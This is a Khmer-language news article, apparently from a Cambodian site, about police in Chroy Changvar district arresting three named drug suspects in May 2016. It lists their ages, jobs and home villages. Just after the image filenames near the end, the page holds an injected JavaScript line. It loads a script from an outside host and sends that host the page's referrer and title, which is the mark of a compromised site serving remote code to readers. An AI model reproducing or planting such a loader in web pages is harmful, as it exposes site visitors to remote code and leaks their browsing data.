ព្រឹតិ្តការណ៍ថ្មីៗ

សមត្ថកិច្ចខណ្ឌជ្រោយចង្វារឃាត់ខ្លួនមនុស្ស៣នាក់ជាបន្តបន្ទាប់ពាក់ព័ន្ធគ្រឿងញៀន

2 ឆ្នាំ មុន 1 tnn_admin

ភ្នំពេញ ៖ អធិការខណ្ឌជ្រោយចង្វារ លោក សៀម សុត្ថាវុធ បានអោយដឹងថាជនសង្ស័យចំនួន០៣នាក់រួម

និងថ្នាំញៀនចំនួន២កញ្ចប់ធំ ត្រូវបានកម្លាំងសមត្ថកិច្ចរបស់លោកបានធ្វើការឃាត់ខ្លួនជាបន្តបន្ទាប់ កាលពីវេលាម៉ោង ៥ល្ងាច ថ្ងៃទី១៩ ខែឧសភា ឆ្នាំ២០១៦ នៅត្រង់ចំណុចមុខវត្តគៀនឃ្លាំង តាមបណ្តោយផ្លូវជាតិលេខ៦ ភូមិគៀនឃ្លាំង សង្កាត់ជ្រោយចង្វារ ខណ្ឌជ្រោយចង្វារ ។

លោកបន្តអោយដឹងថា នៅថ្ងៃទី១៩ ខែឧសភា ឆ្នាំ២០១៦ កម្លាំងសមត្ថកិច្ចបាននឹងកំពុងត្រួតពិនិត្យច្បាប់ចរាចរ និងអាវុធជាតិផ្ទុះ ពេលនោះ ក៏បានប្រទះឃើញជនសង្ស័យ ០២នាក់ ជិះម៉ូតូ មួយគ្រឿង ម៉ាក ហុងដា សេ១២៥ សេរី២០១៣ ពណ៌ខ្មៅ ពាក់ស្លាកលេខ ភ្នំពេញ 1BQ-0921 ក៏បានដាក់អោយជនសង្ស័យម្នាក់ចុះដើរ ហើយកម្លាំងសមត្ថកិច្ចយើងមានការសង្ស័យក៏បានហៅអោយឈប់ តែជនសង្ស័យមិនព្រមឈប់ ក៏បានរត់ឡើងលើជញ្ជាំងរបងផ្ទះគេ ហើយបានបោះចោលថ្នាំញៀន ០២កញ្ចប់ធំ រួចក៏បានធ្វើការឃាត់ខ្លួនជាបន្តបន្ទាប់ និងបានដកហូតម៉ូតូចំនួន ០១គ្រឿង ទើបកម្លាំងសមត្ថកិច្ចចាប់បញ្ជូនខ្លួនមកកាន់អធិការដ្ឋាននគរបាលខណ្ឌដើម្បីសួរនាំបន្ត ។

លោក សៀម សុត្ថាវុធ អធិការនគរបាលខណ្ឌរូបនេះ បានអោយដឹងផងដែរថា ជនសង្ស័យនោះទី១ ឈ្មោះ កាន មឿន ភេទ ប្រុស អាយុ ៣៥ឆ្នាំ មុខរបរ នេសាទ ស្នាក់នៅផ្ទះគ្មាន ផ្លូវជាតិលេខ៦ ភូមិបាក់ខែង សង្កាត់បាក់ខែង ខណ្ឌជ្រោយចង្វារ, ទី២ ឈ្មោះ ប៉ែន វាសនា ភេទ ប្រុស អាយុ ២១ឆ្នាំ មុខរបរ កម្មកររោងចក្រ ស្នាក់នៅផ្ទះគ្មានលេខ ភូមិតាំងក្រាំង ឃុំជីលា ស្រុកបាធាយ ខេត្តកំពង់ចាម និងទី៣ ឈ្មោះ សុខ ឡា ហៅក្រៅ អាខ្ទង ភេទ ប្រុស អាយុ ២២ឆ្នាំ មុខរបរ មិនពិតប្រាកដ ស្នាក់នៅភូមិកងស្វាយ ឃុំស្វាយអំពៅ ស្រុកមុខកំពូល ខេត្តកណ្តាល ។

បច្ចុប្បន្នជនសង្ស័យទាំង ០៣នាក់ កំពុងត្រូវបាន សមត្ថកិច្ច កសាងសំណុំរឿង ដើម្បី បញ្ជូនទៅកាន់តុលាការចាត់ការបន្តតាមផ្លូវច្បាប់ ៕

IMG-20160520-WA0117 IMG-20160520-WA0116 IMG-20160520-WA0115s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ

error: Content is protected !!